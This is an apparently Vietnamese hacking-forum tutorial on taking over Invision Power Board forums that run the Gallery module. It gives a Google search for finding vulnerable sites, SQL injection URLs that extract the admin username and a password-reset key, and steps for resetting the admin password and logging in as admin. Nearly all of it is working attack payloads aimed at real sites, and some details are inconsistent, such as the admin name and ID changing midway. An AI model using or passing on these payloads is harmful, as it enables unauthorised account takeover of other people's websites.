Tổng Hợp hack IBF (bài 3)
Lại IBF
Lỗi Gallery
Test típ nào
Cía này chỉ chơi forum có hỗ trợ Invision Gallery thui nha
Hé bài này chôm của Meox VHS có gì thông cảm heng
chào lên mod rùi tui có 1 bài tặng các bạn
để tìm mục tiêu. bạn vào google và search với key:
allinurl:"index.php?automodule=gallery"
nó sẽ hiện ra 1 đống site, bạn nên kô chọn mấy cái ở trang ở đầu vì mấy trang đó Fix hết rùi
ở đây tui chọn site này:
hxxp://www.nhocikaka.com/forums/index.phpok! test bug. thêm ?automodule=gallery&cmd=rate&img=1&rating=1&album= 1' vào sao index.php
====> ta có link:
hxxp://www.nhocikaka.com/forums/index.php?automodule=gallery&cmd=rate&img=1&rating =1&album=1'
nó hiện ra kết quả:
Code:
mySQL query error: SELECT * FROM ibf_gallery_albums WHERE id=1'
SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
SQL error code:
Date: Friday 13th 2006f October 2006 06:39:58 AM
===> dính bug!, bạn lưu ý phần màu vàng nha là prefic của table nên ghi lại!
tiếp theo, ta vào link sau để đăng ký một nick:
hxxp://www.nhocikaka.com/forums/index.php?act=REG đăng ký xong thì login vào(ko cần validate)!
login xong thì ta nhập link sau vào sau index.php:
automodule=gallery&cmd=rate&img=1&rating=1&album=-1 union select 1,name,1,1,1,1,1,1,1,1 from ibf_members where id=1
chú ý ibf là phần prefix hồi nãy, id là id của admin, có thể là 1,2,3,4,5....hoặc gì đó.để có id chính xác bạn có thể vào index.php?act=members, chọn là Admin hoặc root admin rồi search, thấy Ông nào có level cao nhất là nó, rê chuột vô, trên thanh status sẽ hiện lên showuser={id của nó}===>chính xác!
ok! nhập link vô rùi bấm enter:
hxxp://www.nhocikaka.com/forums/index.php?automodule=gallery&cmd=rate&img=1&rating =1&album=-1 union select 1,name,1,1,1,1,1,1,1,1 from ibf_members where id=1
chờ chút:trên thanh address cái địa chỉ nó trả về như sau:http://www.xxx.com/forums/index.php?automodule=gallery&cmd=user&user=nhocikaka&op=view_album&album=-1%20union%20select%201,name,1,1,1,1,1,1,1,1%20from %20ibf_members%20where%20id=1
kha kha, vậy user của Ông admin là Nhocikaka. đíi reset pass nó coi!
hxxp://www.nhocikaka.com/forums/index.php?act=REG&CODE=10nhập user vô, nhập mấy cái số bảo mật trên tấm hình vô. bấm cái rẹt! Xong, nó báo đã gửi, chờ 10 phút!( có thể nhanh hơn )
tiếp theo, ta nhập link sau:
automodule=gallery&cmd=rate&img=1&rating=1&album=-1 union select 1,vid,1,1,1,1,1,1,1,1 from ibf_validating where member_id=1
chú ý mấy cái ibf và member_id nhé. ibf là prefix, còn member_id là id của Ông admi lấy hồi nãy!
nó trả về trên thanh address như sau:
hxxp://www.xxx.com/forums/index.php?automodule=gallery&cmd=user&user=df5dffadc2136f6b09a54fa59cda6888&op=view_album&album=-1%20union%20select%201,vid,1,1,1,1,1,1,1,1%20from% 20ibf_validating%20where%20member_id=2
ta copy cái dòng sau:df5dffadc2136f6b09a54fa59cda6888
dán vô đâu đó
sau đó vào :hxxp://www.nhocikaka.com/forums/index.php?act=REG&CODE=06
nhập id Ông admin vô! nhập cái dòng hồi nãy là df5dffadc2136f6b09a54fa59cda6888
hai ô dưới nhập password mới cho nó, nhập tiếp mấy cái bảo mật bằng hình wái gì đó, click vô cái nút dễ thương or bấm enter. chờ chút, logout ra, đăng nhập với cái user admin , ở đây là andrew, password là cái pass nãy mình nhập va 2ta sẽ là admin!
Nhocikaka(HCE)